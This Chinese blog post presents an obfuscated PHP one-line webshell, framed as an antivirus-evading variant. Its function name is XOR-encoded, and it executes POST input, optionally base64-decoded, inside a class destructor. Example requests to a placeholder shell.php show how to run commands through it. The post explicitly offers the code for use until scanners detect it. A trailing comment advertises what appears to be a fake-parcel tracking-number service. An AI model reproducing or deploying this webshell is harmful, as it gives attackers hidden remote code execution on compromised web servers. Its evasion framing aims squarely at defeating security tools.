前言
2019年9月9日最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。
<?php
class VMTX{
function __destruct(){
$BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
return @$BRLI("$this->EKDL");
}
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
获取更多资讯请加入交流群
版权说明
本文地址:http://dufengvip.cn/post-177.html
未标注转载均为本站远程,转载请注明文章出处:
sd 2019-11-13 16:03回复
#1
电商专用快递网站,空包网,单号网www.danhw.com
评论列表